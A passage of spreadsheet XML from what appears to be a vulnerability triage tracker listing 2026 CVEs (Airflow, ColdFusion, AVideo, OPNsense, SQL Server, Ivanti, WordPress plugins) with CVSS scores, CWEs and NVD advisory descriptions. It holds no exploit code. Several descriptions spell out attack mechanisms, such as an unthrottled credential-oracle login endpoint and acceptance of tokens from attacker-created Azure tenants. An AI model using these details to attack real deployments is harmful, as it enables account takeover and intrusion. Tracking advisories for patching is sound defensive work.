      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow FAB provider versions 3.7.3 through 3.8.0 do not validate the issuer or audience of Azure AD `id_token`s during OAuth login. Deployments are affected only when the FAB auth manager is configured with Azure AD as an OAuth provider. Because the signing keys are fetched from Microsoft's **multi-tenant** JWKS endpoint, an `id_token` minted in *any* Azure tenant — including one the attacker creates — passes signature verification, and the username and role assignments are then read from that attacker-controlled token. Anyone able to register an Azure tenant can therefore authenticate to the Airflow UI with no prior access to the deployment.
The fix for **CVE-2026-59243** was incomplete, and this advisory closes the remaining gap: that fix made the provider verify the `id_token` signature, but did not add issuer or audience checks. Operators who already applied the CVE-2026-59243 fix are **still affected and must upgrade again** — 3.7.3 is the release that shipped that fix, so every version containing it falls inside this affected range. Upgrade to apache-airflow-providers-fab `3.8.1` or later.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75156</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75746</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker with high privileges could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75746</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79571</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79571</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86729</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit e01e41ecc (no patched version available) exposes get_api_preauthorize in plugin/API/API.php as a second, undocumented login path. Unlike get_api_signIn, which enforces a rate limit of 10 attempts per 5 minutes via checkRateLimit(), get_api_preauthorize performs the same credential check with no throttling for any client, allowing unlimited remote password guessing against arbitrary accounts, including admin. The endpoint also acts as a credential oracle: it returns the message "Invalid credentials" for both correct and incorrect passwords, while the users_id field in the response body discloses the authenticated identity (users_id:1 on success, users_id:0 on failure), and a correct password establishes a session cookie that remains usable for authenticated API requests. Together these issues permit unauthenticated brute-force account takeover.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86729</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86840</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>The `vtoken-minting` and `slpx` pallets in Bifrost contain an improper authorization vulnerability in channel commission attribution. A signed account can supply an arbitrary registered `channel_id` when minting tokens without verifying that the caller is authorized to mint on behalf of that channel. This allows an attacker to inflate a channel's recorded mint volume and cause protocol commission payments to be disproportionately distributed to that channel during commission settlement.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86840</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53581</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>OPNsense is a FreeBSD based firewall and routing platform. Prior to version 26.1.9 of opnsense/core and version 26.4_20 of BE/opnsense/core, a path traversal vulnerability in the NTP configuration module allows an attacker to overwrite arbitrary files on the system as the root user. By manipulating the GPS or PPS serial port parameter, an attacker with access to the NTP configuration can escape the intended directory and force the system to write user-controlled data to any file on the filesystem. Version 26.1.9 of opnsense/core and version 26.4_20 of BE/opnsense/core patch the issue.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53581</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66768</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66768</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67378</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K96" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67378</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67636</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K97" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67636</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69854</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85982</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>The Auth0 AD/LDAP Connector is vulnerable to stored Cross-Site Scripting (XSS) issues due to improper HTML encoding of data in search results and updater log content displayed in the admin panel. An authenticated user with privileges to modify directory attributes, or a low-privileged local user on the host where the connector is installed, could insert script content. This script content could then execute in an administrator's browser when they view the affected search results or update logs.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85982</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50093</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Siveillance Control Pro V3.0 (All versions &lt; V3.0.12.2173), Siveillance Control Pro V4.0 (All versions &lt; V4.0.9.2178), Siveillance Control V3.0 (All versions &lt; V3.0.22.2177), Siveillance Control V4.0 (All versions &lt; V4.0.11.2177). A vulnerability in the OIS web module allows an attacker to upload arbitrary files to the server. Successful exploitation of this vulnerability could allow an attacker to gain root access on the host system, potentially leading to a full compromise of the affected OIS environment.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50093</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12648</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12648</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12651</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12651</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16502</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>The Live Composer – Free WordPress Website Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.1.18 via deserialization of untrusted input . This makes it possible for authenticated attackers, with contributor-level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T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16502</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18851</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr">
        <is>
          <t>ivanti:endpoint_manager_mobile</t>
        </is>
      </c>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Ivanti Endpoint Manager Mobile before version 12.10.0.0, 12.9.0.2, and 12.8.0.4 allows a remote authenticated attacker to escalate their privileges to admin.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18851</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28609</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
